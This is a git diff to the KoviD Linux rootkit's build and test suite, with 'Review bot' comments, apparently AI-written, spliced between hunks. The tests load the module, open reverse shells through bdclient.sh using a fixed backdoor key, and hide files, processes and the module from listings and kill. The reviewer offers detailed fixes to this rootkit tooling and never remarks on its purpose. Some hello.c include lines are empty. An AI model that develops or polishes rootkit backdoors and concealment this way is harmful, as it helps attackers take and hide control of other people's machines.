diff --git a/Makefile b/Makefile
index 606fd13..e2b9547 100644
--- a/Makefile
+++ b/Makefile
@@ -11,8 +11,15 @@ AS=$(shell which as)
 CTAGS=$(shell which ctags)
 JOURNALCTL := $(shell which journalctl)
 UUIDGEN := $(shell uuidgen)
+
+# For tests, use hardcoded keys.
+ifndef TEST_ENV
 BDKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
 UNHIDEKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
+else
+BDKEY=0x7d3b1cb572f16425
+UNHIDEKEY=0x2
+endif
 
 # PROCNAME, /proc/ interface.
 COMPILER_OPTIONS := -Wall -DPROCNAME='"$(PROCNAME)"' \
diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md
index fc533eb..7aa48b8 100644
--- a/docs/TestFeatures.md
+++ b/docs/TestFeatures.md
@@ -39,7 +39,7 @@ $ cmake -DPROCNAME=myproc -DMODNAME=mymodule ../
 
 If you want to build and run native tests only, just use:
 ```
-$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname"
+$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1
 ```
 
 ## Building for Linux version other than native
@@ -109,9 +109,10 @@ $ make
 
 To simply run those (but make sure you followed the instructions for setting the enviroment described below):
 ```
+ $ cd KoviD && make PROCNAME="myprocname" TEST_ENV=1
  # From root directory of the project
  $ mkdir build && cd build
- $ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname"
+ $ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1
  # Please run the command with only one Thread!
  $ make check-kovid -j1
 ```
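Review bot: The `ifndef TEST_ENV` branch is selected by the variable merely being defined — including from the caller's environment, since make imports every environment variable — so a stray exported `TEST_ENV` silently builds the module with the fixed BDKEY/UNHIDEKEY and nothing in the build output shows it. Make the test build unmistakable and keep the assignment flavour consistent with the surrounding `:=` lines: `else`, `$(warning TEST_ENV set: building with fixed test BDKEY/UNHIDEKEY)`, `BDKEY := 0x7d3b1cb572f16425`. The comment `# For tests, use hardcoded keys.` sits above the non-test branch; rewording it as `# Fresh random keys per build; TEST_ENV=1 selects fixed keys for the test suite.` avoids misreading. The BDKEY test value is repeated literally in nc-backdoor-echo-s.test, nc-backdoor.test, openssl-backdoor.test and tty-backdoor.test, so any change here has to be mirrored in all four.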
@@ -187,7 +188,7 @@ Usual set of commands to be used:
 $ git clone https://github.com/carloslack/KoviD.git main-KoviD && cd main-KoviD
 $ git submodule update --init test/test-artefacts
 $ mkdir build && cd build
-$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" && make check-kovid
+$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1 && make check-kovid
 ```
 
 ## Insall dependecies and set up enviroment
@@ -269,7 +270,7 @@ Run tests in `DEPLOY` mode (some tests are run in this mode only; this is exampl
 
 ```
 $ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=projects/private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCROSS_TESTS=ON -DCMAKE_C_COMPILER=gcc -DDEPLOY=1
-$ make PROCNAME="myprocname" DEPLOY=1
+$ make PROCNAME="myprocname" DEPLOY=1 TEST_ENV=1
 $ make check-kovid
 ```
 
@@ -306,3 +307,7 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co
 | tty backdoor | Yes | native/tty-backdoor.test |
 | backdoor echo -s | Yes | native/nc-backdoor-echo-s.test |
 | Hide/Unhide Module | Yes | native/hide-unhide-module.test |
+| backdoor + PID | Yes | native/nc-backdoor-plus-pid.test |
+| hide file | Yes | native/hiden-file.test |
+| hide file (2) | Yes | native/hiden-file-in-all-dirs.test |
+| unhide module | Yes | native/hide-unhide-module.test |
diff --git a/test/native/Inputs/Makefile b/test/native/Inputs/Makefile
new file mode 100644
index 0000000..53ce8ac
--- /dev/null
+++ b/test/native/Inputs/Makefile
@@ -0,0 +1,7 @@
+obj-m = hello.o
+
+all:
+	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+	make --C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
diff --git a/test/native/Inputs/hello.c b/test/native/Inputs/hello.c
new file mode 100644
index 0000000..353c00a
--- /dev/null
+++ b/test/native/Inputs/hello.c
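Review bot: The `clean` recipe in test/native/Inputs/Makefile passes `--C` (double dash), which is not a make option, so `make clean` fails before it reaches the kernel build tree; it should be `-C` as in `all`. Both recipes should also invoke `$(MAKE)` rather than a literal `make` so -j/-n and the jobserver propagate into the kernel build, and `$(CURDIR)` is a safer stand-in for `$(PWD)`, which make only inherits from the shell environment: `$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(CURDIR) modules` and `$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(CURDIR) clean`. `all` and `clean` are not files, so a `.PHONY: all clean` line belongs at the top.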
@@ -0,0 +1,24 @@
+#include
+#include
+#include
+
+MODULE_LICENSE("GPL");
+
+MODULE_DESCRIPTION("A simple Hello world LKM!");
+
+MODULE_VERSION("0.1");
+
+static int __init hello_start(void)
+{
+	printk(KERN_INFO "Loading hello module...\n");
+	printk(KERN_INFO "Hello world\n");
+	return 0;
+}
+
+static void __exit hello_end(void)
+{
+	printk(KERN_INFO "Goodbye!!!\n");
+}
+
+module_init(hello_start);
+module_exit(hello_end);
diff --git a/test/native/Inputs/simple-test.c b/test/native/Inputs/simple-test.c
new file mode 100644
index 0000000..f8528a7
--- /dev/null
+++ b/test/native/Inputs/simple-test.c
@@ -0,0 +1,6 @@
+int main()
+{
+	while(1);
+
+	return 0;
+}
diff --git a/test/native/hide-unhide-module.test b/test/native/hide-unhide-module.test
index 59ed72e..13ceff5 100644
--- a/test/native/hide-unhide-module.test
+++ b/test/native/hide-unhide-module.test
@@ -1,4 +1,3 @@
-# REQUIRES: 0
 # REQUIRES: DEBUG_ONLY
 # REQUIRES: NATIVE_TESTS
 
@@ -8,8 +7,10 @@ sleep 10
 
 sudo insmod ../../../build/kovid.ko
 lsmod | grep kovid
-echo -h > /proc/myprocname
+kill -CONT 31337
+echo hide-lkm > /proc/myprocname
 lsmod | grep kovid
+echo unhide-lkm=2 > /proc/myprocname
 sudo rmmod kovid
 
 # CHECK: kovid
diff --git a/test/native/hiden-file-in-all-dirs.test b/test/native/hiden-file-in-all-dirs.test
new file mode 100644
index 0000000..45a9d20
--- /dev/null
+++ b/test/native/hiden-file-in-all-dirs.test
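Review bot: The three `#include` lines in hello.c carry no header name as rendered here; if that is how the file was committed it cannot compile, and if the names were lost in rendering it is worth confirming the committed file has them, since simple-insmod-hello-ko.test depends on this module building. Inside a kernel module `pr_info("Hello world\n");` is the idiomatic spelling of `printk(KERN_INFO "Hello world\n");`, and the same for the other two messages; the message text is what the test's `# CHECK:` lines match, so it must stay byte-identical.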
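Review bot: `while(1);` in simple-test.c spins a CPU core for as long as the process lives, and nc-backdoor-plus-pid.test deliberately leaves the process unkillable while hidden, so every run parks a busy-looping process on the host; `for (;;) pause();` keeps the process alive for the test while it sleeps. The file is only ever referenced as a pre-built `./Inputs/a.out` and nothing in the commit builds it; a one-line comment naming the intended build step (for example `cc simple-test.c -o a.out`, if that is what is meant) documents how that binary comes to exist.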
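Review bot: `echo unhide-lkm=2 > /proc/myprocname` hard-codes the unhide key, which only matches a module built with `TEST_ENV=1` (the top-level Makefile fixes UNHIDEKEY to 0x2 in that branch); against a default build with a random key the unhide is ignored and it is `sudo rmmod kovid` that fails, which is not obvious from the log. A comment above the line, `# 2 is the fixed UNHIDEKEY of a TEST_ENV=1 build (see top-level Makefile)`, records the coupling. `kill -CONT 31337` is equally unexplained — presumably a signal the module treats as a trigger, given the fixed PID — and the same line appears in hiden-file.test, hiden-file-in-all-dirs.test and nc-backdoor-plus-pid.test; one comment stating what it does would serve all of them.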
@@ -0,0 +1,30 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+
+TEST_FILE="hidden_file.txt"
+
+# Create a file with the same name in another directory
+OTHER_DIR="/tmp/other_dir"
+mkdir -p "$OTHER_DIR"
+touch "$OTHER_DIR/$TEST_FILE"
+
+# Hide the file using the backdoor
+echo hide-file-anywhere="$TEST_FILE" > /proc/myprocname
+
+# Check that files with the same name in other directories are also hidden
+ls "$OTHER_DIR" | grep "$TEST_FILE" || echo "File is hidden in other directory"
+
+# Cleanup
+rm -rf "$OTHER_DIR"
+
+# Remove the kernel module
+sudo rmmod kovid
+
+# CHECK: File is hidden in other directory
diff --git a/test/native/hiden-file.test b/test/native/hiden-file.test
new file mode 100644
index 0000000..aef8702
--- /dev/null
+++ b/test/native/hiden-file.test
@@ -0,0 +1,29 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+
+# Create a test directory and file
+TEST_DIR="/tmp/test_hide_file"
+TEST_FILE="hidden_file.txt"
+mkdir -p "$TEST_DIR"
+touch "$TEST_DIR/$TEST_FILE"
+
+# Hide the file using the backdoor
+echo hide-file="$TEST_DIR/$TEST_FILE" > /proc/myprocname
+
+# Verify that the file is hidden when listing the directory
+ls "$TEST_DIR" | grep "$TEST_FILE" || echo "File is hidden"
+
+# Cleanup
+rm -rf "$TEST_DIR"
+
+# Remove the kernel module
+sudo rmmod kovid
+
+# CHECK: File is hidden
diff --git a/test/native/nc-backdoor-echo-s.test b/test/native/nc-backdoor-echo-s.test
index d983f4e..4e1035d 100644
--- a/test/native/nc-backdoor-echo-s.test
+++ b/test/native/nc-backdoor-echo-s.test
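Review bot: The assertion `ls "$OTHER_DIR" | grep "$TEST_FILE" || echo "File is hidden in other directory"` also prints the success message when the file was never created (a failed `touch`, a wrong directory), because grep finds nothing either way; a positive control before the hide, `ls "$OTHER_DIR" | grep -q "$TEST_FILE" && echo "File is visible before hide"` with a matching `# CHECK: File is visible before hide` placed first, makes the test prove the hide actually changed something. `rm -rf "$OTHER_DIR"` runs while the entry is still hidden; if the hide works by filtering directory listings, rm may not see the file and the directory is left behind, so the cleanup belongs after `sudo rmmod kovid` — the same two points apply to hiden-file.test. Both new tests, like nc-backdoor-plus-pid.test and simple-insmod-hello-ko.test, are added with `# REQUIRES: 0`, which — going by the hide-unhide-module.test change that removes that line to enable it — leaves them unsupported while docs/TestFeatures.md lists them as enabled; confirm that is intended.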
@@ -8,8 +8,8 @@ sudo dmesg -c
 
 sleep 10
 sudo insmod ../../../build/kovid.ko
-sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999
-echo -s > /proc/myprocname
+sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425
+echo list-hidden-tasks > /proc/myprocname
 sudo rmmod kovid
 sudo dmesg
 
@@ -17,9 +17,9 @@ sudo dmesg
 # CHECK: Waiting for event
 # CHECK: loaded
 # CHECK: Got event
-# CHECK: hide [{{.*}}] {{.*}}
-# CHECK: hide [{{.*}}] {{.*}}
-# CHECK: BD : dash
-# CHECK: BD : bash
+# CHECK: hide: {{.*}}
+# CHECK: hide: {{.*}}
+# CHECK: hide: {{.*}}
+# CHECK: hide: {{.*}}
 # CHECK: Got event
 # CHECK: unloaded
diff --git a/test/native/nc-backdoor-plus-pid.test b/test/native/nc-backdoor-plus-pid.test
new file mode 100644
index 0000000..b02c5be
--- /dev/null
+++ b/test/native/nc-backdoor-plus-pid.test
@@ -0,0 +1,36 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo insmod ../../../build/kovid.ko
+
+# Start the reverse shell in the background, suppressing its output
+sudo timeout 20 ../../../scripts/bdclient.sh nc localhost 9999 > /dev/null 2>&1 &
+
+# Allow the reverse shell to initialize
+sleep 1
+
+# Send a signal to the "kill -CONT 31337" process as an additional check
+kill -CONT 31337 || echo "sh: can't kill pid 31337: No such process"
+
+# Run the `a.out` executable in the background and capture its PID
+./Inputs/a.out &
+AOUT_PID=$!
+
+# Wait briefly to ensure the process has started
+sleep 1
+
+# Hide the process using the backdoor functionality
+echo hide-task-backdoor=$AOUT_PID > /proc/myprocname
+
+# Attempt to kill the hidden process and verify that it fails
+kill -9 "$AOUT_PID" || echo "sh: can't kill pid $AOUT_PID: No such process"
+
+# Remove the module
+sudo rmmod kovid
+
+# CHECK: sh: can't kill pid 31337: No such process
+# CHECK: sh: can't kill pid {{.*}}: No such process
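Review bot: The literal `0x7d3b1cb572f16425` appended to the `bdclient.sh nc localhost 9999` line ties this test to a module built with `TEST_ENV=1`, but nothing in the test's `# REQUIRES:` lines expresses that; against a default build with a random BDKEY the client never connects and the failure shows up only as missing `Got event`/`hide:` lines in dmesg. A comment on the line, `# fixed test BDKEY; only valid for a TEST_ENV=1 build (see top-level Makefile)`, makes the dependency visible, and the same applies to the identical edits in nc-backdoor.test, openssl-backdoor.test and tty-backdoor.test. The file is still named after the old `echo -s` command while the new body writes `list-hidden-tasks`; the docs table row should at least say which command the test exercises.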
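Review bot: After `sudo rmmod kovid` the `a.out` process — which the test expects to survive `kill -9` while hidden — is never killed, so each run leaks a background process that, with the current simple-test.c, busy-loops a core; add `kill -9 "$AOUT_PID" 2>/dev/null || true` after the rmmod line, and `wait` for or kill the backgrounded bdclient.sh as well. The comment `# Send a signal to the "kill -CONT 31337" process as an additional check` restates the command rather than its purpose; say what PID 31337 means to the module and why the first `# CHECK:` expects that kill to fail. Unlike the other four backdoor tests in this commit, the `bdclient.sh nc localhost 9999` call here is not given the test key argument; if the client needs it, the reverse shell never comes up and the test still passes because its output is discarded to /dev/null.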
diff --git a/test/native/nc-backdoor.test b/test/native/nc-backdoor.test
index 0f27278..be76639 100644
--- a/test/native/nc-backdoor.test
+++ b/test/native/nc-backdoor.test
@@ -1,3 +1,4 @@
+# REQUIRES: 0
 # REQUIRES: DEBUG_ONLY
 # REQUIRES: NATIVE_TESTS
 
@@ -7,7 +8,7 @@ sudo dmesg -c
 
 sleep 10
 sudo insmod ../../../build/kovid.ko
-sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999
+sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425
 sudo rmmod kovid
 sudo dmesg
 
diff --git a/test/native/openssl-backdoor.test b/test/native/openssl-backdoor.test
index 5ab43bd..0ee75fd 100644
--- a/test/native/openssl-backdoor.test
+++ b/test/native/openssl-backdoor.test
@@ -6,7 +6,7 @@
 # RUN: FileCheck-18 --input-file=%t.log %s
 
 sudo insmod ../../../build/kovid.ko
-sudo timeout 10 ../../../scripts/bdclient.sh openssl localhost 9999
+sudo timeout 10 ../../../scripts/bdclient.sh openssl localhost 9999 0x7d3b1cb572f16425
 sudo rmmod kovid
 
 # CHECK: ACCEPT
diff --git a/test/native/simple-insmod-hello-ko.test b/test/native/simple-insmod-hello-ko.test
new file mode 100644
index 0000000..b3a6c22
--- /dev/null
+++ b/test/native/simple-insmod-hello-ko.test
@@ -0,0 +1,18 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+## Make sure you enter `test/native/Inputs` and run `make`
+## in order to build `hello.ko`.
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 2
+sudo insmod ../../../test/native/Inputs/hello.ko
+sudo rmmod hello
+sudo dmesg
+
+# CHECK: Loading hello module...
+# CHECK: Hello world
diff --git a/test/native/tty-backdoor.test b/test/native/tty-backdoor.test
index b404346..a884619 100644
--- a/test/native/tty-backdoor.test
+++ b/test/native/tty-backdoor.test
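Review bot: `# REQUIRES: 0` is added to nc-backdoor.test without a reason, and this is the commit's mechanism for switching a test off (hide-unhide-module.test has the same line removed to enable it), so a reader cannot tell whether the test is broken, superseded by nc-backdoor-echo-s.test, or temporarily skipped — while the second hunk still updates its bdclient.sh key as if it were live. Put the reason on a comment line beneath it, `## Disabled: <reason>`, in the same `##` note style simple-insmod-hello-ko.test uses for its build prerequisite.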
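Review bot: simple-insmod-hello-ko.test depends on hello.ko having been built by hand beforehand (the `##` note), so on a fresh checkout it fails at `sudo insmod ../../../test/native/Inputs/hello.ko` with a missing-file error rather than a clear message; either build it inside the test — `make -C ../../../test/native/Inputs` before the insmod and `make -C ../../../test/native/Inputs clean` after the rmmod — or at least guard with `test -f ../../../test/native/Inputs/hello.ko || echo "hello.ko not built"` and a matching CHECK-NOT. `sudo dmesg -c` discards the host's entire kernel log before the check; the other native tests do the same, and a one-line comment noting that this is deliberate (the CHECK lines need a clean buffer) would stop a reviewer from flagging it each time.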
@@ -8,7 +8,7 @@ sudo dmesg -c
 
 sleep 20
 sudo insmod ../../../build/kovid.ko
-sudo timeout 10 ../../../scripts/bdclient.sh tty localhost 9999
+sudo timeout 10 ../../../scripts/bdclient.sh tty localhost 9999 0x7d3b1cb572f16425
 sudo rmmod kovid
 sudo dmesg
 